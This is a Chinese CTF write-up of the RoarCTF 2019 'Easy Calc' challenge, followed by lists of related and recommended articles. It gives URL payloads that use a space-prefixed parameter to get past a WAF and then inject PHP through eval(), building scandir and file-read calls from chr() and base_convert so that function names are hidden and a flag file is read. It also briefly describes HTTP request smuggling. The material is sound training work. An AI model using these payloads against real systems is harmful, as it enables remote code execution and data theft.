简介

 原题复现:

 考察知识点:http协议走私、php字符串解析漏洞

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

过程

一枚菜狗打开页面  懵逼一个小时然后   搜索WP。。。。。

查看源码发现

利用php字符串解析漏洞

计算的时候会访问calc.php页面  访问它获得源码  审计发现有个过滤  过滤完执行eval()

所以可以构造

http://node3.buuoj.cn:28719/calc.php?num=phpinfo()  出错 被waf挡住了

http://node3.buuoj.cn:28719/calc.php?%20num=phpinfo() 利用php字符串解析特性在变量前面加上空格即可绕过   绕过姿势文章:https://www.freebuf.com/column/207936.html

继续构造

http://node3.buuoj.cn:28719/calc.php?%20num=var_dump(scandir(chr(47)))

http://node3.buuoj.cn:28719/calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

HTTP走私绕过WAF

http协议走私基础:https://www.cnblogs.com/xhds/p/12339994.html

CL-CL

两个CL直接导致前端转发的服务器400,而且完整转发了post包给后端。

CL-TE

CL和TE直接导致前端转发的服务器400,而且完整转发了post包给后端。

构造payload获得Flag
使用scandir()函数readfile()函数base_convert()函数dechex() 函数hex2bin() 函数chr()函数
36进制scandir->10进制61693386291
36进制readfile->10进制2146934604002
ascii码/->16进制2f->10进制47
36进制f1agg->10进制25254448(读取根目录得到的)





var_dump(base_convert(61693386291,10,36)(chr(47)))






读取flag




var_dump(base_convert(2146934604002,10,36)(chr(47).base_convert(25254448,10,36)))






参考学习:https://xz.aliyun.com/t/6654
												


											
[原题复现+审计][RoarCTF 2019]Easy Calc(http协议走私、php字符串解析漏洞)的更多相关文章
	

    
								
  1. [原题复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP伪协议、数组绕过)
		
    简介  原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/  考察知识点:反序列化.PHP伪协议.数组绕过   ...
    
		
    2. 
						
  2. [原题复现+审计][SUCTF 2019] WEB CheckIn(上传绕过、.user.ini)
		
    简介  原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn  考察知识点:上传绕过..user.ini  线上平台:h ...
    
		
    3. 
						
  3. buuoj [RoarCTF 2019]Easy Calc(利用PHP的字符串解析特性)
		
    web [RoarCTF 2019]Easy Calc(利用PHP的字符串解析特性) 先上源码 <?phperror_reporting(0);if(!isset($_GET['num'])){ ...
    
		
    4. 
						
  4. [RoarCTF 2019]Easy Calc
		
    [RoarCTF 2019]Easy Calc 题目 题目打开是这样的 查看源码 .ajax是指通过http请求加载远程数据. 可以发现有一个calc.php,输入的算式会被传入到这个php文件里,尝 ...
    
		
    5. 
						
  5. [原题复现+审计][BUUCTF 2018]WEB Online Tool(escapeshellarg和escapeshellcmd使用不当导致rce)
		
    简介  原题复现:https://github.com/glzjin/buuctf_2018_online_tool (环境php5.6.40)  考察知识点:escapeshellarg和escap ...
    
		
    6. 
						
  6. [原题复现+审计][CISCN2019 华北赛区 Day1 Web2]ikun(逻辑漏洞、JWT伪造、python序列化)
		
    简介  原题复现:  考察知识点:逻辑漏洞.JWT伪造.python反序列化  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台 ...
    
		
    7. 
						
  7. [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
    简介  原题复现:  考察知识点:反序列化.数组绕过  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
    
		
    8. 
						
  8. [原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)
		
    简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过 ...
    
		
    9. 
						
  9. [原题复现+审计][BJDCTF2020]Mark loves cat($$导致的变量覆盖问题)
		
    简介  原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January  考察知识点:$$导致的变量覆盖问题  线上平台:https://buuoj.cn( ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Ⅳ Monte Carlo Methods
			
    Dictum:  Nutrition books in the world. There is no book in life, there is no sunlight; wisdom withou ...
    
			
    2. 
						
  2. 如何实现 axios 的自定义适配器 adapter
			
    Axios 是一个非常优秀的基于 promise 的 HTTP 库,可以用在浏览器和 node.js 中.并且提供了很多便捷的功能,例如: 支持 Promise API 拦截请求和响应 转换请求数据和 ...
    
			
    3. 
						
  3. java实现单链表、栈、队列三种数据结构
			
    一.单链表 1.在我们数据结构中,单链表非常重要.它里面的数据元素是以结点为单位,每个结点是由数据元素的数据和下一个结点的地址组成,在java集合框架里面 LinkedList.HashMap(数组加 ...
    
			
    4. 
						
  4. Educational Codeforces Round 95 (Rated for Div. 2)
			
    CF的Educational Round (Div.2),质量还是蛮高的. A: 水题 #include<cstdio> #include<algorithm> typedef ...
    
			
    5. 
						
  5. 4g数据无线传输终端dtu
			
    将串口数据转换为IP数据或将IP数据转换为串口数据并且进行传输的过程被称为数据透明传输,利用4G网络进行数据透明传输的设备被称为4G网络无线数据双向透明传输终端,也可以称为4G DTU,现在市面上大多 ...
    
			
    6. 
						
  6. Java学习的第二十二天
			
    1.异常处理 try...catch...finally... finally带return finally也可省略 try里面可以有try 多个异常用IllegalAgruementExceptio ...
    
			
    7. 
						
  7. python中的递归
			
    python中的递归 关注公众号"轻松学编程"了解更多. 文章更改后地址:传送门 间接或直接调用自身的函数被称为递归函数. 间接: def func(): otherfunc()  ...
    
			
    8. 
						
  8. PageHelper使用步骤
			
    一.导入jar包(maven构建导入坐标) <dependency> <groupId>com.github.pagehelper</groupId> <ar ...
    
			
    9. 
						
  9. LWJGL3的内存管理,第一篇,基础知识
			
    LWJGL3的内存管理,第一篇,基础知识 为了讨论LWJGL在内存分配方面的设计,我将会分为数篇随笔分开介绍,本篇将主要介绍一些大方向的问题和一些必备的知识. 何为"绑定(binding)& ...
    
			
    10. 
						
  10. Java-GUI基础(三)java.swing
			
    1. 简介 swing与awt:可以认为awt是swing的前身,awt即Abstrace Window Toolkit抽象窗口工具包,swing是为了解决awt在开发中的问题而开发的,是awt的改良 ...
    
			
    11.